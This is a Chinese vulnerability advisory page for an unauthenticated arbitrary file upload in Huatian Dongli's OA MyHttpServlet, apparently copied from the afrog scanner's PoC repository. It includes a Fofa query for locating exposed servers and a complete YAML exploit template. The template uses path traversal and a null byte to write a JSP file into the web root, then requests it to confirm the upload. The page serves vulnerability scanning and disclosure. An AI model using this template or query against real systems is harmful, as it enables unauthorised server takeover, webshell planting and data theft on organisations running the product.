漏洞信息
漏洞名称: 华天动力 MyHttpServlet 任意文件上传
漏洞类型: 文件上传
漏洞等级: 严重
漏洞描述: 华天动力的MyHttpServlet存在一个任意文件上传漏洞,该漏洞允许攻击者通过构造特定的HTTP请求,将恶意文件上传到服务器上。这种漏洞通常由于服务器对上传文件的类型、内容或路径验证不严格导致。华天动力是一家提供企业级应用解决方案的公司,其产品广泛应用于各类企事业单位中,用于办公自动化和业务流程管理。
该漏洞的技术根源在于MyHttpServlet对用户上传的文件没有进行严格的验证和过滤,攻击者可以利用这一点,通过构造特殊的HTTP请求,绕过服务器的安全限制,上传任意文件到服务器的任意目录。特别是,攻击者可以利用该漏洞上传Web Shell等恶意脚本,进而获取服务器的控制权限。
此漏洞的影响极为严重,因为它允许未经授权的攻击者远程执行代码,可能导致服务器被完全控制,敏感数据泄露,甚至服务中断。由于漏洞利用不需要任何形式的认证,攻击者可以轻松地自动化攻击过程,对受影响系统构成重大威胁。因此,所有使用华天动力MyHttpServlet的用户都应立即检查并修复此漏洞,以防止潜在的安全风险。
产品厂商: 华天动力
产品名称: MyHttpServlet
搜索语法: body=”/OAapp/WebObjects/OAapp.woa” || body=”/OAapp/htpages/app”
来源: https://github.com/zan8in/afrog/blob/b9686a5c4553da942d9b8736d91cd87b6ee026b1/pocs%2Fafrog-pocs%2Fvulnerability%2Fhuatiandongli-myhttpservlet-fileupload.yaml
类型: zan8in/afrog:github commit
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
id: huatiandongli-myhttpservlet-fileupload
info:
name: 华天动力 MyHttpServlet 任意文件上传
author: zan8in
severity: critical
verified: false
description: |-
华天动力 MyHttpServlet 任意文件上传
Fofa: body="/OAapp/WebObjects/OAapp.woa" || body="/OAapp/htpages/app"
reference:
- https://mp.weixin.qq.com/s?__biz=MzkzNjYwODg3Ng==&mid=2247484255&idx=1&sn=593fb55af1dc091ae6a4e94de018dbc2
tags: huatian,huatiandongli,fileupload
created: 2024/01/16
set:
rboundary: randomLowercase(8)
filename: randomLowercase(6)
bodystr: randomLowercase(16)
rules:
r0:
request:
method: POST
path: /OAapp/MyHttpServlet?username=admin
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../webapps/ROOT/{{filename}}.jsp%00.jpg\r\n\
\r\n\
{{bodystr}}\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200
r1:
request:
method: GET
path: /{{filename}}.jsp;.html
expression: response.status == 200 && response.body.bcontains(bytes(bodystr))
expression: r0() && r1()
|